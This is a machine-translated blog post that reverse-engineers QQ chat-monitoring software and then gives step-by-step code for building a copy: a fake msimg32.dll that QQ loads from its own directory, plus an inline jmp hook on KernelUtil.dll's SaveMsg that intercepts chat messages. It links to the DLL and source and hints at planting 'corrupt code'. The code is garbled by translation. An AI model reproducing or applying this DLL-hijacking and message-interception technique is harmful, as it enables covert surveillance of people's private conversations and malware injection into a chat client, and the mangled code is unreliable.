Qq computer monitoring software 8.21

Disclaimer: the programs in this post are for learning purposes only and cannot be used for illegal purposes. Otherwise, the consequences will be borne by you. It has nothing to do with me!
I will not crack this time. I will only analyze its principles.
 
After installation, load and run it with od.
After debugging, such


 
Smass will copy im32.dll and msimg32.dll under its own installation directory to the qq running directory. Because msimg32.dll is a system dll, it will be loaded when qq runs. So we use ida to open msimg32.dll and see what is done in it.

 
Open im32.dll with ida To see what im32.dll has done,
 
 





In fact, im32.dll hook KernelUtil. dll and transfer it to sub_10001000 in msimg32.dll. The following is an analysis of sub_10001000,
 
 
After the above analysis, we can know the principle of this software:
1. Copy the self-compiled msimg32.dll and im32.dll to the qq directory.
2. When Qq.exe is running, it first loads the msimg32.dll in its directory, instead of the msimg32.dll in the system directory.
3. msimg32.dll In the Qq directory loads msimg32.dll and im32.dll in the system directory, and implements the interface of the original msimg32.dll.
4. After im32.dll is loaded, will the KernelUtil. dll function be hooked? SaveMsg @ Msg @ Util @ YAHPB_WKKKPAUITXMsgPack @ PAUITXData @ Z, and transfer it to sub_10001000.
5. In sub_10001000, the chat message is sent to the Lou Yue client through FindWindow and SendMessage.
 
Now that you know the principle, You can implement it on your own.
1. Create a dll project msimg32
2. Implement the msimg32.dll interface of the system
Typedef void (WINAPI * _ vSetDdrawflag )();
Typedef BOOL (WINAPI * _ AlphaBlend) (HDC hdcDest, int xoriginDest, int yoriginDest, int wDest,
Int hDest, HDC hdcSrc, int xoriginSrc, int yoriginSrc, int wSrc, int hSrc, BLENDFUNCTION ftn );
Typedef BOOL (WINAPI * _ DllInitialize) (HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved );
Typedef BOOL (WINAPI * _ GradientFill) (HDC hdc, PTRIVERTEX pVertex, ULONG nVertex, PVOID pMesh, ULONG nMesh, ULONG ulMode );
Typedef BOOL (WINAPI * _ TransparentBlt) (HDC hdcDest, int xoriginDest, int yoriginDest, int wDest, int hDest,
HDC hdcSrc, int xoriginSrc, int yoriginSrc, int wSrc, int hSrc, UINT crTransparent );
 
_ VSetDdrawflag g_p_vSetDdrawflag = NULL;
_ AlphaBlend g_p_AlphaBlend = NULL;
_ DllInitialize g_p_DllInitialize = NULL;
_ GradientFill g_p_GradientFill = NULL;
_ TransparentBlt g_p_TransparentBlt = NULL;
 
BOOL InitDll ()
{
CString strSysDir;
GetSystemDirectoryEx (strSysDir );
StrSysDir. AppendFormat (_ T ("\ msimg32.dll "));
 
HMODULE hDll = LoadLibrary (strSysDir );
If (NULL! = HDll)
{
G_p_vSetDdrawflag = (_ vSetDdrawflag) GetProcAddress (hDll, "vSetDdrawflag ");
G_p_AlphaBlend = (_ AlphaBlend) GetProcAddress (hDll, "AlphaBlend ");
G_p_DllInitialize = (_ DllInitialize) GetProcAddress (hDll, "DllInitialize ");
G_p_GradientFill = (_ GradientFill) GetProcAddress (hDll, "GradientFill ");
G_p_TransparentBlt = (_ TransparentBlt) GetProcAddress (hDll, "TransparentBlt ");
}
 
Return (
(NULL! = G_p_vSetDdrawflag) & (NULL! = G_p_AlphaBlend )&&
(NULL! = G_p_DllInitialize) & (NULL! = G_p_GradientFill )&&
(NULL! = G_p_TransparentBlt)
);
}
3. What are the functions of hook KernelUtil. dll? SaveMsg @ Msg @ Util @ YAHPB_WKKKPAUITXMsgPack @ PAUITXData @ Z
Typedef int (WINAPI * _ SaveMsg) (DWORD, DWORD );
Typedef int (WINAPI * _ GetMsgAbstract) (DWORD, DWORD );
 
DWORD g_dwRetAddr = 0;
_ SaveMsg g_p_SaveMsg = NULL;
_ GetMsgAbstract g_p_GetMsgAbstract = NULL;
 
_ Declspec (naked) void JmpFun ()
{
_ Asm
{
Pushfd
Pushad
 
Push dword ptr [ebp + 0x1c] // parameter 6
Push dword ptr [ebp + 0x18] // parameter 5
Push dword ptr [ebp + 0x14] // parameter 4
Push dword ptr [ebp + 0x10] // parameter 3
Push dword ptr [ebp + 0x0c] // parameter 2
Push dword ptr [ebp + 0x8] // parameter 1
Call Bob_SaveMsg
 
Popad
Popfd
 
 
//. Text: 3182BA70 push ebp
//. Text: 3182BA71 mov ebp, esp
//. Text: 3182BA73 push 0 ffffffh
//. Text: 3182BA75 push offset loc_3185F4A8 // the address of the bounce
//. Text: 3182BA7A mov eax, large fs: 0
//. Text: 3182BA80 push eax
//. Text: 3182BA81 sub esp, 38 h
//. Text: 3182BA84 push ebx
//. Text: 3182BA85 push esi
//. Text: 3182BA86 push edi
 
Push ebp
Mov ebp, esp
Push 0x0FFFFFFFF
 
Jmp g_dwRetAddr
}
}
 
BOOL BobHook ()
{
BOOL bRet = FALSE;
HMODULE hDll = LoadLibraryW (DLL_NAME_OF_CRACK );
If (NULL! = HDll)
{
G_p_SaveMsg = (_ SaveMsg) GetProcAddress (hDll ,"? SaveMsg @ Msg @ Util @ YAHPB_WKKKPAUITXMsgPack @ PAUITXData @ Z ");
G_p_GetMsgAbstract = (_ GetMsgAbstract) GetProcAddress (hDll ,"? GetMsgAbstract @ Msg @ Util @ YA? AVCTXStringW @ PAUITXMsgPack @ Z ");
If (NULL! = G_p_SaveMsg & NULL! = G_p_GetMsgAbstract)
{
DWORD dwTemp, dwOldFlag, dwCrack = (DWORD) g_p_SaveMsg;
G_dwRetAddr = dwCrack + LEN_OF_CRACK;
If (VirtualProtect (LPVOID) dwCrack, LEN_OF_CRACK, PAGE_READWRITE, & dwOldFlag ))
{
JmpCode struJmp;
StruJmp. byJmpCode [3] = 0x0e9; // jmp
StruJmp. dwJmpCode [1] = GetMachineCode (dwCrack, JmpFun );
BRet = WriteProcessMemory (GetCurrentProcess (), (LPVOID) dwCrack, & (struJmp. byJmpCode [3]), LEN_OF_CRACK, & dwTemp );
VirtualProtect (LPVOID) dwCrack, LEN_OF_CRACK, dwOldFlag, & dwTemp );
}
}
}
 
Return bRet;
}
4. Output chat Information
Void WINAPI Bob_SaveMsg (int a1, const wchar_t * Format, const wchar_t * a3, const wchar_t * a4, int a5, int a6)
{
If (NULL = g_p_GetMsgAbstract)
{
DbgOutput (_ T ("In Bob_SaveMsg (), g_p_GetMsgAbstract is NULL ..."));
Return;
}
 
// Only debug information is displayed here, and chat data is not displayed.
Static int nCount = 1;
DbgOutput (_ T ("In Bob_SaveMsg (), nCount: % d..."), nCount ++ );
}
 
After compiling msimg32.dll, you also need to modify the export table of msimg32.dll to make the Name Ordinal and Name of the export table the same as that of the system msimg32.dll.


 
Put the modified msimg32.dll In the qq installation directory, and then run qq,
 


 
I opened the legendary qq manager and ran qq ,:

 
Here I want to talk nonsense, qq is too insecure, qq manager is too weak. If I write some corrupt code in msimg32.dll, then.


Dll and source code:

Http://www.bkjia.com/uploadfile/2012/0302/20120302105338340.rar
Author guxinyi